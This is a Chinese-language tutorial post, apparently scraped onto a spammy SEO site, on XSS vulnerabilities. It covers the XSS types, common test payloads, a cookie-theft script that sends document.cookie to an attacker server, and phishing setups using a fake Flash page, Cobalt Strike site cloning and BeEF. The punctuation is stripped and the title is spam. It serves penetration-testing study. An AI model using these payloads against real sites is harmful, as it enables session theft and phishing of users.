做sohu最好的推广网站在网上做软件挣钱的网站
- 作者: 五速梦信息网
- 时间: 2026年03月21日 04:58
当前位置: 首页 > news >正文
做sohu最好的推广网站,在网上做软件挣钱的网站,王占山教授,江门市骏业纸制品有限公司1.JavaScript
JavaScript 是一种脚本#xff0c;一门编程语言#xff0c;它可以在网页上实现复杂的功能#xff0c;网页展现给你的不再是简单的静态信息#xff0c;而是实时的内容更新#xff0c;交互式的地图#xff0c;2D/3D动画#xff0c;滚动播放的视频等等。
一门编程语言它可以在网页上实现复杂的功能网页展现给你的不再是简单的静态信息而是实时的内容更新交互式的地图2D/3D动画滚动播放的视频等等。
1BOM
浏览器对象模型JS通过BOM 访问浏览器相关的信息对浏览器进行交互获取宽高改变当前窗口的地址。通常用来证明漏洞的存在比如XSS漏洞。
2事件
不管什么语言事件无处不在事件是用户与web页面交互时发生的事情例如单击链接或按钮、向输入框或文本区输入文本、在选择框中进行选择、按键盘上的键、移动鼠标指针、提交表单等。在某些情况下浏览器本身可以触发事件例如页面加载和卸载事件
3事件处理程序
事件处理程序事件就是用户与浏览器交互后执行的某种动作而响应某个事件的函数叫做事件处理程序(事件侦听器)。
按照惯例事件处理程序的名称总是以“on”开头因此单击事件的事件处理程序称为onclick加载事件的事件处理程序称为onload模糊事件的事件处理程序称为onblur等等。
2.跨站脚本攻击漏洞
跨站脚本 (Cross-site scripting简称XSS)是指恶意攻击者往Web页面里插入恶意代码当受害者加载网站时代码就会执行。恶意代码可以通过几种方式插入。最常见的是添加到 URL 的末尾或者直接发布到显示用户生成的内容的页面上。用更专业的术语来说跨站脚本是一种客户端代码注入攻击。
1危害
A.钓鱼欺骗最典型的就是利用目标网站的反射型跨站脚本漏洞将目标网站重定向到钓鱼网站或者注入钓鱼 JavaScript 以监控目标网站的表单输入甚至发起基于 DHTML 更高级的钓鱼攻击方式。
B.网站挂马跨站时利用 IFrame 嵌入隐藏的恶意网站或者将被攻击者定向到恶意网站上或者弹出恶意网站窗口等方式都可以进行挂马攻击。
C.身份盗用Cookie 是用户对于特定网站的身份验证标志XSS 可以盗取到用户的 Cookie从而利用该 Cookie 盗取用户对该网站的操作权限。如果一个网站管理员用户 Cookie 被窃取将会对网站引发巨大的危害。
D.盗取网站用户信息当能够窃取到用户 Cookie 从而获取到用户身份使攻击者可以获取到用户对网站的操作权限从而查看用户隐私信息。
E.垃圾信息发送比如在 SNS 社区中利用 XSS 漏洞借用被攻击者的身份发送大量的垃圾信息给特定的目标群。
F.劫持用户 Web 行为一些高级的 XSS 攻击甚至可以劫持用户的 Web 行为监视用户的浏览历史发送与接收的数据等等。
G.XSS 蠕虫XSS 蠕虫可以用来打广告、刷流量、挂马、恶作剧、破坏网上数据、实施 DDoS 攻击等。
2分类
A.反射型XSS
反射型XSS又称非持久型XSS攻击相对于受害者而言是一次性的具体表现在受害者点击了含有的恶意JavaScript脚本的url恶意代码并没有保存在目标网站而Web应用程序只是不加处理的把该恶意脚本“反射”回受害者的浏览器而使受害者的浏览器执行相应的脚本
B.存储型XSS
存储型XSS是指应用程序通过Web请求获取不可信赖的数据在未检验数据是否存在XSS代码的情况下便将其存入数据库 当下一次从数据库中获取该数据时程序也未对其进行过滤页面再次执行XSS代码持续攻击用户。存储型XSS漏洞大多出现在留言板、评论区用户提交了包含XSS代码的留言到数据库当目标用户查询留言时那些留言的内容会从服务器解析之后加载出来。
C.DOM型
不与后台服务器交互数据也属于反射型的一种一种通过dom操作前端输出的时候产生问题DOM全称Document biect Model是一个平台和语言都中立的接口可以使程序和脚本能够动态访问和更新文档的内容、结构以及样式DOM-XSS简单理解就是不与后台服务器产生数据交互是一种通过DOM操作前端代码输出的时候产生的问题。
3.常见测试代码
input οnfοcuswrite(xss) autofocus
img src οnerrοralert(xss)
svg οnlοadalert(xss)
scriptalert(xss)/script
a hrefjavascript:alert(xss)clickme/a
/tdscriptalert(123456)/script
scriptalert(123456)/script
scriptalert(123456)/script
/titlescriptalert(123456)/script
scripscripttalert(123456)/scrip/scriptt
/divscriptalert(123456)/script
4.盗取cookie
1首先在公网服务器启动一个用于接收cookie的web服务
python3 -m http.server –bind 0.0.0.0 2333
2在xss漏洞的地方插入攻击代码
script
window.open(http://192.168.169.1:2333/?qbtoa(document.cookie))
/script 受害者视角
受害者访问了插入xss代码的网页触发了漏洞在浏览器打开了一个新的网站并将cookie发送的攻击者的服务器 攻击者视角
启动的web服务器接收到了受害者浏览器发送的cookie请求 5.Flash钓鱼
利用伪造的flash网站进行钓鱼真伪网站之间除网址不同以外其他都相同
1拉取docker镜像修改index文件将其改为php文件并对flash.js文件进行修改将ip改为虚拟机iphtml文件改为php文件再次注意绝对路径问题 2向存在xss漏洞的地方插入攻击代码注意ip地址和端口的更改
script srchttp://192.168.190.133:9957/flash.js/script 当受害者访问该网站后会有弹窗弹出提醒当前flash版本过低需要升级版本当我们点击确定后即会跳转到攻击者伪造好的flash网站点击下载时便会执行攻击者注入的恶意文件 6.Cobalt Strike钓鱼
一款团队作战渗透测试神器
1)下载cs给予其执行权限并启动服务器 主机即为虚拟机地址 2)开始克隆 3通过短信钓鱼邮件钓鱼xss漏洞等方式将克隆好的网站发送给受害者
以下是克隆好后的网站 4将下面的js文件放入到网站目录里
window.location.href后接我们自己克隆好的网站地址
window.alert function(name){ var iframe document.createElement(IFRAME); iframe.style.display none; iframe.setAttribute(src,date:text/plain); document.documentElement.appendChild(iframe); window.frames [0].window.alert(name); iframe.parentNode.removeChild(iframe);
}
alert(登陆过期请重新登陆);
window.location.hrefhttp://192.168.190.134/ 启动监听端口 5受害者视角
以下是利用xss漏洞向其中插入payload用户在访问时会看到提示登录过期重新登录如若输入用户名和密码则会被攻击者所截获 6攻击者视角 7.BEEF钓鱼
1利用xss漏洞注入payload
将注入好漏洞的网站想办法让受害者点击 2我们可以通过beef发送一些指令到受害者浏览器上
可以看到已经控制了受害者浏览器 3受害者视角 8.流量劫持
利用木马修改浏览器不停的弹出新的窗口强制性让用户访问指定网站
例如在xss漏洞注入payload自动跳转至百度 受害者视角
- 上一篇: 做soho的网站asp.net 网站安装包
- 下一篇: 做sorry动图的网站专业制作网站哪家好
相关文章
-
做soho的网站asp.net 网站安装包
做soho的网站asp.net 网站安装包
- 技术栈
- 2026年03月21日
-
做seo要明白网站内容深圳网络营销公司排行榜
做seo要明白网站内容深圳网络营销公司排行榜
- 技术栈
- 2026年03月21日
-
做seo网站优化哪家强公司网站要备案吗
做seo网站优化哪家强公司网站要备案吗
- 技术栈
- 2026年03月21日
-
做sorry动图的网站专业制作网站哪家好
做sorry动图的网站专业制作网站哪家好
- 技术栈
- 2026年03月21日
-
做T恤卖网站企业网站模板用哪个
做T恤卖网站企业网站模板用哪个
- 技术栈
- 2026年03月21日
-
做ui必要的网站可以兼职做翻译的网站或app
做ui必要的网站可以兼职做翻译的网站或app
- 技术栈
- 2026年03月21日
